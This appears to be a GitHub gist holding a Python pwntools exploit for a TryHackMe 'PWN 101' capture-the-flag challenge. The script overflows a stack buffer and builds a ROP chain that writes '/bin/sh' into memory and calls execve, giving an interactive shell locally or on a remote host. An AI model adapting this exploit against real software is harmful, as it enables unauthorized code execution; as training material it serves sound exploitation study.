@DanaEpp
Last active May 10, 2022 23:43
THM PWN 101 - Challenge 10 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
# Path of the challenge binary. The hard-coded gadget and .data addresses further
# down were taken from this exact build, so swapping the file invalidates them.
exe = "./pwn110.pwn110"
# Load the ELF and make it the pwntools context binary (arch/bits for packing and
# ROP() are derived from it). checksec=False only silences the mitigation summary;
# the chain below relies on absolute addresses and therefore presumes a non-PIE
# binary -- run checksec once by hand if this build is ever replaced.
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
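def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    The mode comes from pwntools' ``args`` (passed on the command line as the
    bare words ``GDB`` or ``REMOTE``):
      * GDB     -> run locally under gdb, feeding it the module-level ``gdbscript``.
      * REMOTE  -> connect to ``sys.argv[1]:sys.argv[2]`` (host, port).
      * default -> plain local process.

    argv: extra command-line arguments for the binary; never mutated.
    *a / **kw are forwarded untouched to whichever tube constructor is used.
    """
    # Build a fresh list each call instead of sharing a mutable default.
    extra = list(argv) if argv is not None else []
    if args.GDB:
        return gdb.debug([exe] + extra, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # Fail with a message instead of an IndexError when host/port are missing.
        if len(sys.argv) < 3:
            log.error("REMOTE mode needs <host> <port> on the command line")
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + extra, *a, **kw)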
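# Specify your GDB script here for debugging (only used in GDB mode, see start()).
# Kept as a plain literal: nothing is interpolated, and piping it through
# str.format() would raise on any '{' / '}' that is legitimate gdb syntax
# (e.g. `set {int}$rsp = 0`).
gdbscript = '''
continue
'''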
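offset = 32 + 8  # 32-byte buffer + 8-byte saved RBP: distance to the saved return address

log.info( "Building ROP chain..." )
rop = ROP(elf)

# Everything below is an absolute address (hand-picked gadgets and .data), which
# only holds when the binary is loaded at its link address, i.e. it is not PIE.
if elf.pie:
    log.error("%s is PIE: the hard-coded gadget/.data addresses will not be valid" % exe)

# Scratch memory for execve's arguments: "/bin/sh\0" at .data and a NULL qword
# (doubling as the empty argv[] and envp[]) at .data+8, so 16 bytes are needed.
data_sec = elf.get_section_by_name('.data')
if data_sec is None:
    log.error("no .data section in %s" % exe)
data_section = data_sec.header.sh_addr
if data_sec.header.sh_size < 16:
    log.error(".data is only %d bytes; need 16 for the execve arguments" % data_sec.header.sh_size)

# Gadget addresses found by hand for this build (the 0x44xxxx-0x47xxxx range
# suggests a statically linked binary -- verify with checksec if in doubt).
write_gadget = 0x47bcf5    # mov qword ptr [rsi], rax; ret  // write-what-where gadget
xor_rax_gadget = 0x443e30  # xor rax, rax; ret
add_rax_gadget = 0x470d20  # add rax, 1; ret
syscall_gadget = rop.find_gadget(['syscall'])  # we want a syscall gadget WITHOUT the ret
if syscall_gadget is None:  # find_gadget() returns None rather than raising
    log.error("no bare 'syscall' gadget found in %s" % exe)
syscall = syscall_gadget.address

# ----------------------------------------------------
# | syscall    | %rax | %rdi      | %rsi    | %rdx    |
# ----------------------------------------------------
# | SYS_execve | 59   | *filename | *argv[] | *envp[] |
# ----------------------------------------------------

# 1. Write "/bin/sh\0" into .data.
rop.raw(rop.rsi.address)        # pop rsi; ret
rop.raw(data_section)           # @ .data
rop.raw(rop.rax.address)        # pop rax; ret
rop.raw(b'/bin/sh\x00')         # exactly 8 bytes, so it fills one qword
rop.raw(write_gadget)           # mov qword ptr [rsi], rax; ret
# 2. Write a NULL qword to .data+8 (serves as both argv[] and envp[]).
rop.raw(rop.rsi.address)        # pop rsi; ret
rop.raw(data_section + 8)       # @ .data + 8
rop.raw(xor_rax_gadget)         # xor rax, rax; ret
rop.raw(write_gadget)           # mov qword ptr [rsi], rax; ret
# 3. Load the execve argument registers.
rop.raw(rop.rdi.address)        # pop rdi; ret
rop.raw(data_section)           # rdi = "/bin/sh"
rop.raw(rop.rsi.address)        # pop rsi; ret
rop.raw(data_section + 8)       # rsi = argv = {NULL}
rop.raw(rop.rdx.address)        # pop rdx; ret
rop.raw(data_section + 8)       # rdx = envp = {NULL}
# 4. rax = SYS_execve (59) via repeated increments, then trap into the kernel.
#    NOTE(review): a single `pop rax` with 59 would shave ~470 bytes off the
#    chain; the increment loop is kept as written -- confirm there is no
#    bad-byte reason for it before collapsing.
rop.raw(xor_rax_gadget)         # xor rax, rax; ret
for _ in range(int(constants.SYS_execve)):
    rop.raw(add_rax_gadget)     # add rax, 1; ret
rop.raw(syscall)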
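log.info( "Starting exploit run..." )
p = start()

# Build the payload once so it can be inspected before it is sent.
payload = fit({offset: rop.chain()})
# sendlineafter() terminates the input with '\n'; if the target reads a line
# (gets/fgets), a 0x0a byte inside the chain truncates it. Warn rather than
# abort, since a read()-based target is unaffected.
if b"\n" in payload:
    log.warning("payload contains 0x0a at offset %d; a line-based read will truncate it"
                % payload.index(b"\n"))

log.info( "Sending payload..." )
p.sendlineafter( b"without libc \xf0\x9f\x98\x8f", payload )
p.clean()
p.interactive()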